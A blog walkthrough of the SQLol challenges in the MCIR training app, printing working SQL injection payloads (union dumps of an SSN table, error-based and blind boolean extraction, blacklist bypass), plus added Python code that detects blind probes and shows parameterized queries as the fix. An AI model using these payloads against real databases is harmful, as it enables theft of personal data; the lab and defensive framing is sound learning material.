Environment: xampp-win32-5.6.3-0-VC11, mcir

Preface

MCIR is also one of the top ten, but why does it feel like nobody writes blog posts or anything else about it? That makes it really hard for a beginner to learn this system, very hard indeed.... My plan was to spend two days studying and organizing material. A whole day has already gone by and I'm still fumbling in the dark; comparing the time spent with what I've actually got done, I feel terrible. Ugh, the pressure is huge!!!

In the end I found a video on YouTube and watched a bit of it, which gave me some feel for it. Video: Riding the Magical Code Injection Rainbow (MCIR) with Daniel Crowley


Preparation

First change the database connection password in the application (if you are using the XAMPP bundle, just set the password to empty), in the file

D:\xampp\htdocs\mcir\sqlol\includes\database.config.php

Getting started

After opening the home page, select SQLol; you will see this:

| INSERT | UPDATE | DELETE | SELECT | Custom | Challenges |

Select Challenges; once inside you will see the following image:
[image]

We take the challenges one at a time, following its challenge levels.

Challenge 0

This one is simple; it asks for all usernames:

Your objective is to get the query to return all usernames instead of just one. 

The hint says the parameter is a string type, so the following statement is used directly and gives the result:

[image]

Of course, besides ' or '1'='1 , we can also use the '=' injection method shown in the official video.

Challenge 1

Challenge 1 requires the following:

Your objective is to find the table of social security numbers present in the database and extract its information. 

Now we need to find the table. My approach was as follows:

Use order by to determine the number of columns in the result set: 1.
Then get the connected user, the database and the version with the following statement:

' and 1=2 union select concat_ws(char(32,58,32),user(),database(),version()) # 

The result is: root@localhost : sqlol : 5.6.21

Then we enumerate the tables under sqlol (0x73716C6F6C is the hex encoding of the string sqlol, which avoids the need for quotes):

' and 1=2 union select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x73716C6F6C #

This gives two tables: ssn and users

We are asked for social security numbers; looking at these two tables, it must be the ssn table. OK, let's get all the columns of the ssn table (0x73736E is the hex encoding of ssn):

' and 1=2 union select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x73736E # 

This gives two columns: name and ssn

Then dump the values of those columns:

' and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn # 

The information obtained is shown below:

[image]

Challenge 2 - The Failure of Quote Filters

In Challenge 2, at first glance the requirement looks identical to the one above. I copied the last statement from above straight over. Huh, an error. After reading the challenge description more carefully:

Many people sanitize or remove single quotes in their Web applications to prevent SQL injection attacks. While this can be effective against injection into string parameters, it is ineffective at preventing injection into parameters which are not quote delimited, like integers or datetime values. This places restrictions on how your injection string can be written, but does not present much of an obstacle to an attacker.

Having reluctantly read through it, I found that the web application filters single quotes. So let's try removing the single quotes:

and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #

The result is as follows:

[image]

Challenge 3 - Death Row

The description of this challenge:

You don't always have the luxury of retrieving all rows of output from a query when performing an SQL injection attack. Sometimes, you only get one row. This challenge is similar to challenge 1, "SQL Injection 101", but only provides one row of output. To make things more challenging, this challenge configuration does not show you the query.

Roughly, the requirement is the same as in Challenge 1, but the result is no longer every row; only one row is returned per query.

For this type, we construct statements as follows, walking the rows one OFFSET at a time:

' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 #
' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 #
...

Challenge 4 - War on Error

The description:

In this challenge, no output from the query is shown, but verbose errors are shown.

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT blind SQL injection techniques.

Here the query result is not displayed, so the statement must be constructed to carry the data into the error message (error reporting must be enabled for this to work).

Construct the statements as follows:

' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a
' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a
...

Challenge 5 - Blind Luck

The description:

You must perform a basic Blind SQL injection attack. Only an indication of whether the query returned results is available.

Here error reporting is turned off, and the injection is done blind.

For this kind of injection the result comes back as a boolean, so when constructing the statement we have to make it a true/false test??? And it seems it must use or???

' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 79 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 71 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 67 #
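The probes above leak one comparison result per request, which is also what makes them visible on the server side: the same client sends the same statement shape over and over, changing only the number it compares against. As an added detection example (not part of the original post or of MCIR), the Python scanner below parses constructed Apache-style access log lines and flags clients that sent several boolean probes of one shape. The path /mcir/sqlol/select.php and the parameter name inject_string are assumptions about the SQLol form; the three encoded probes are the Challenge 5 payloads as a browser would URL-encode them.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access log (Apache combined style, not taken from the page).
# Path and parameter name are assumptions; the three probes are the Challenge 5 payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:10:00:01 +0800] "GET /mcir/sqlol/select.php?inject_string=%27+or+ascii%28substring%28%28select+table_name+from+information_schema.tables+limit+1+offset+0%29%2C1%2C1%29%29+%3E%3D+79+%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2015:10:00:02 +0800] "GET /mcir/sqlol/select.php?inject_string=%27+or+ascii%28substring%28%28select+table_name+from+information_schema.tables+limit+1+offset+0%29%2C1%2C1%29%29+%3E%3D+71+%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2015:10:00:03 +0800] "GET /mcir/sqlol/select.php?inject_string=%27+or+ascii%28substring%28%28select+table_name+from+information_schema.tables+limit+1+offset+0%29%2C1%2C1%29%29+%3E%3D+67+%23 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2015:10:00:04 +0800] "GET /mcir/sqlol/select.php?inject_string=alice HTTP/1.1" 200 498
"""

# The fields of one combined-log line that the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Shape of a boolean-based probe: a boolean connective, then one character is
# extracted (substring/substr/mid) and compared as a number (ascii/ord).
PROBE_RE = re.compile(
    r"\b(or|and)\b.*\b(ascii|ord)\s*\(\s*(substring|substr|mid)\s*\(", re.IGNORECASE
)


def parse_line(line):
    """Return (client_ip, URL-decoded query string), or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = m.group("path").partition("?")[2]
    return m.group("ip"), unquote_plus(query)


def looks_like_boolean_probe(decoded_query):
    return PROBE_RE.search(decoded_query) is not None


def normalize(decoded_query):
    """Collapse numeric literals so probes that differ only in the compared value share one shape."""
    return re.sub(r"\d+", "N", decoded_query.lower())


def find_blind_sequences(log_text, min_variants=3):
    """Clients that sent at least min_variants distinct probes of the same shape.

    One probe can be noise; a run of them differing only in the number is the
    signature of character-by-character extraction. Returns [(ip, count), ...].
    """
    variants = defaultdict(set)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, decoded = parsed
        if looks_like_boolean_probe(decoded):
            variants[(ip, normalize(decoded))].add(decoded)
    return sorted(
        (ip, len(seen)) for (ip, _shape), seen in variants.items() if len(seen) >= min_variants
    )


if __name__ == "__main__":
    for ip, count in find_blind_sequences(SAMPLE_LOG):
        print(f"{ip}: {count} boolean probes of the same shape")
```

Counting distinct variants of one normalized shape, rather than raw keyword hits, is what separates a scripted extraction from a single stray request; the threshold is deliberately low here because each probe only yields one bit, so a real extraction produces many of them.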

Challenge 6 - Stack the Deck

In this challenge, you must utilize stacked queries due to the difficulty of extraction in the SQLi scenario.

Your objective is to create a new table called "ipwntyourdb" using stacked queries. 

Challenge 6 is about stacked queries, but PHP apparently doesn't support that; see the description here: SQL: Does php+mysql support stacked queries?

And this challenge doesn't seem to be implemented ----

Challenge 7 - Walking on Thin Ice

In this challenge, no output from the query is shown, but verbose errors are shown.

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database.
(If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.) 

....An injection vulnerability involving delete; I currently don't know how to get there.

Challenge 8 - Black Comedy

You must perform a very basic SQL injection attack, but a primitive blacklisting filter is in place.

Your objective is to find the table of social security numbers present in the database and extract its information. 

The default blacklist filter is in place, but it can be bypassed with mixed-case keywords; the injection statement is:

' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username='
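The quote filter of Challenge 2 and the blacklist of Challenge 8 fail for the same reason: they edit the input while the query is still assembled by string concatenation, so the structure of the query stays under the caller's control (no quotes are needed in a numeric context, and a case-sensitive word list misses uNion). The Python/sqlite3 example below is added here and is not SQLol's code. It shows both filters beside the fix that makes them unnecessary: binding every value as a parameter, and validating integers before binding them. It also covers the UPDATE of Challenge 9 in bound form. The users/ssn schema and the sample rows are constructed; the id and isadmin columns follow the Challenge 9 description.

```python
import re
import sqlite3

# Constructed stand-in for the SQLol schema seen in Challenge 1 (tables "users" and "ssn").
# The users columns "id" and "isadmin" follow the Challenge 9 description; the rows are made up.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, isadmin INTEGER NOT NULL DEFAULT 0);
CREATE TABLE ssn (name TEXT, ssn TEXT);
INSERT INTO users (id, username, isadmin) VALUES (1, 'alice', 1), (2, 'bob', 0), (3, 'carol', 0);
INSERT INTO ssn (name, ssn) VALUES ('alice', '000-00-0001'), ('bob', '000-00-0002');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- the two filters the challenges show being defeated --------------------

def strip_quotes(value):
    """Challenge 2's quote filter: drops single quotes and nothing else."""
    return value.replace("'", "")


BLACKLIST = ("union", "select", "where")


def blacklist_allows(value):
    """Challenge 8's primitive blacklist: case-sensitive substring match."""
    return not any(word in value for word in BLACKLIST)


def filtered_query(user_input, numeric_context):
    """The SQL a strip-then-concatenate application would build.

    Returned as text and never executed here: the point is what survives the
    filter. In numeric context the input needs no quotes, so nothing is removed.
    """
    cleaned = strip_quotes(user_input)
    if numeric_context:
        return "SELECT username FROM users WHERE id = " + cleaned
    return "SELECT username FROM users WHERE username = '" + cleaned + "'"


# --- the fix: bind every value, and type-check integers before binding -----

def is_valid_id(raw_id):
    """Integer context: only a plain decimal is accepted, whatever else it says."""
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None


def safe_lookup_by_name(conn, name):
    """Whatever 'name' holds is compared as one string value, keywords and all."""
    return conn.execute("SELECT username FROM users WHERE username = ?", (name,)).fetchall()


def safe_lookup_by_id(conn, raw_id):
    if not is_valid_id(raw_id):
        raise ValueError("id must be a decimal integer")
    return conn.execute("SELECT username FROM users WHERE id = ?", (int(raw_id),)).fetchall()


def safe_rename_user(conn, raw_id, new_name):
    """The Challenge 9 UPDATE with both values bound: only 'username' of that one
    row can change, and a quote inside the new name needs no stripping."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a decimal integer")
    cur = conn.execute("UPDATE users SET username = ? WHERE id = ?", (new_name, int(raw_id)))
    conn.commit()
    return cur.rowcount


def admin_flags(conn):
    """Snapshot of (id, isadmin) to confirm nothing but the intended column moved."""
    return conn.execute("SELECT id, isadmin FROM users ORDER BY id").fetchall()


if __name__ == "__main__":
    db = make_db()
    print(filtered_query("1 and 1=2 union select name from ssn", numeric_context=True))
    print(safe_lookup_by_name(db, "' uNion seLect null from users whEre username='"))
    safe_rename_user(db, "2", "o'brien")
    print(safe_lookup_by_id(db, "2"), admin_flags(db))
```

Making the blacklist case-insensitive would only move the problem (comments, alternative whitespace and encodings remain); the bound-parameter versions need no list at all because the database receives the statement and the values separately, so the value can never become part of the statement.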

Challenge 9 - Administrative Tasks

In this challenge, you are working with an UPDATE query. The query updates the field "username" in the "users" table for a given user.

Your objective is to inject into the query and cause it to update the "isadmin" field to 1 for the user with id 3. 

Not implemented-----


mugbya